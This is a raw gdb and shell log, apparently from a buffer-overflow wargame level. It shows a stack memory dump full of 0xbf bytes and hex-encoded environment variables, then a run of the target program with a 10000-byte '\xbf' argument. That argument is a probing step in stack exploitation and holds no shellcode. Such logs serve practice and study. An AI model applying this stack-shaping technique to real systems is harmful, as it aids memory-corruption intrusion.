0xbffff970: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff980: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff990: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffffa80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffaa0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffab0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffac0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffad0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffae0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffaf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbf00  0xbfbfbfbf
0xbffffb20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffba0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbe0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffffc10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc90: 0xbfbfbfbf  0x454c00bf  0x504f5353  0x7c3d4e45
0xbffffca0: 0x7273752f  0x6e69622f  0x73656c2f  0x70697073
0xbffffcb0: 0x68732e65  0x00732520  0x52455355  0x454d414e
0xbffffcc0: 0x4948003d  0x49535453  0x313d455a  0x00303030
0xbffffcd0: 0x54534f48  0x454d414e  0x636f6c3d  0x6f686c61
0xbffffce0: 0x6c2e7473  0x6c61636f  0x616d6f64  0x4c006e69
0xbffffcf0: 0x414e474f  0x743d454d  0x6c6c6f72  0x4d455200
0xbffffd00: 0x4845544f  0x3d54534f  0x2e323931  0x2e383631
0xbffffd10: 0x2e353332  0x414d0031  0x2f3d4c49  0x2f726176
0xbffffd20: 0x6f6f7073  0x616d2f6c  0x742f6c69  0x6c6c6f72
0xbffffd30: 0x52455400  0x74783d4d  0x006d7265  0x54534f48
0xbffffd40: 0x45505954  0x3833693d  0x41500036  0x2f3d4854
0xbffffd50: 0x2f727375  0x61636f6c  0x69622f6c  0x622f3a6e
0xbffffd60: 0x2f3a6e69  0x2f727375  0x3a6e6962  0x7273752f
0xbffffd70: 0x3131582f  0x622f3652  0x2f3a6e69  0x656d6f68
0xbffffd80: 0x6f72742f  0x622f6c6c  0x48006e69  0x3d454d4f
0xbffffd90: 0x6d6f682f  0x72742f65  0x006c6c6f  0x55504e49
(gdb) 
0xbffffda0: 0x3d435254  0x6374652f  0x706e692f  0x63727475
0xbffffdb0: 0x45485300  0x2f3d4c4c  0x2f6e6962  0x68736162
0xbffffdc0: 0x45535500  0x72743d52  0x006c6c6f  0x48534142
0xbffffdd0: 0x564e455f  0x6f682f3d  0x742f656d  0x6c6c6f72
0xbffffde0: 0x61622e2f  0x63726873  0x53494400  0x59414c50
0xbffffdf0: 0x3239313d  0x3836312e  0x3533322e  0x303a312e
0xbffffe00: 0x4c00302e  0x3d474e41  0x555f6e65  0x534f0053
0xbffffe10: 0x45505954  0x6e694c3d  0x53007875  0x4c564c48
0xbffffe20: 0x4c00313d  0x4f435f53  0x53524f4c  0x3d6f6e3d
0xbffffe30: 0x663a3030  0x30303d69  0x3d69643a  0x333b3130
0xbffffe40: 0x6e6c3a34  0x3b31303d  0x703a3633  0x30343d69
0xbffffe50: 0x3a33333b  0x303d6f73  0x35333b31  0x3d64623a
0xbffffe60: 0x333b3034  0x31303b33  0x3d64633a  0x333b3034
0xbffffe70: 0x31303b33  0x3d726f3a  0x303b3130  0x37333b35
0xbffffe80: 0x3a31343b  0x303d696d  0x35303b31  0x3b37333b
0xbffffe90: 0x653a3134  0x31303d78  0x3a32333b  0x6d632e2a
0xbffffea0: 0x31303d64  0x3a32333b  0x78652e2a  0x31303d65
0xbffffeb0: 0x3a32333b  0x6f632e2a  0x31303d6d  0x3a32333b
0xbffffec0: 0x74622e2a  0x31303d6d  0x3a32333b  0x61622e2a
0xbffffed0: 0x31303d74  0x3a32333b  0x68732e2a  0x3b31303d
0xbffffee0: 0x2a3a3233  0x6873632e  0x3b31303d  0x2a3a3233
0xbffffef0: 0x7261742e  0x3b31303d  0x2a3a3133  0x7a67742e
0xbfffff00: 0x3b31303d  0x2a3a3133  0x6a72612e  0x3b31303d
0xbfffff10: 0x2a3a3133  0x7a61742e  0x3b31303d  0x2a3a3133
0xbfffff20: 0x687a6c2e  0x3b31303d  0x2a3a3133  0x70697a2e
(gdb) 
0xbfffff30: 0x3b31303d  0x2a3a3133  0x303d7a2e  0x31333b31
0xbfffff40: 0x5a2e2a3a  0x3b31303d  0x2a3a3133  0x3d7a672e
0xbfffff50: 0x333b3130  0x2e2a3a31  0x3d327a62  0x333b3130
0xbfffff60: 0x2e2a3a31  0x303d7a62  0x31333b31  0x742e2a3a
0xbfffff70: 0x31303d7a  0x3a31333b  0x70722e2a  0x31303d6d
0xbfffff80: 0x3a31333b  0x70632e2a  0x303d6f69  0x31333b31
0xbfffff90: 0x6a2e2a3a  0x303d6770  0x35333b31  0x672e2a3a
0xbfffffa0: 0x303d6669  0x35333b31  0x622e2a3a  0x303d706d
0xbfffffb0: 0x35333b31  0x782e2a3a  0x303d6d62  0x35333b31
0xbfffffc0: 0x782e2a3a  0x303d6d70  0x35333b31  0x702e2a3a
0xbfffffd0: 0x303d676e  0x35333b31  0x742e2a3a  0x303d6669
0xbfffffe0: 0x35333b31  0x3d5f003a  0x61762f2e  0x7069706d
0xbffffff0: 0x2f2e0065  0x706d6176  0x00657069  0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
(gdb) 
0xc0000004: Cannot access memory at address 0xc0000004
(gdb) 
0xc0000008: Cannot access memory at address 0xc0000008
(gdb) 
0xc000000c: Cannot access memory at address 0xc000000c
(gdb) 
0xc0000010: Cannot access memory at address 0xc0000010
(gdb) 
0xc0000014: Cannot access memory at address 0xc0000014
(gdb) 
0xc0000018: Cannot access memory at address 0xc0000018
(gdb) q
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*10000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿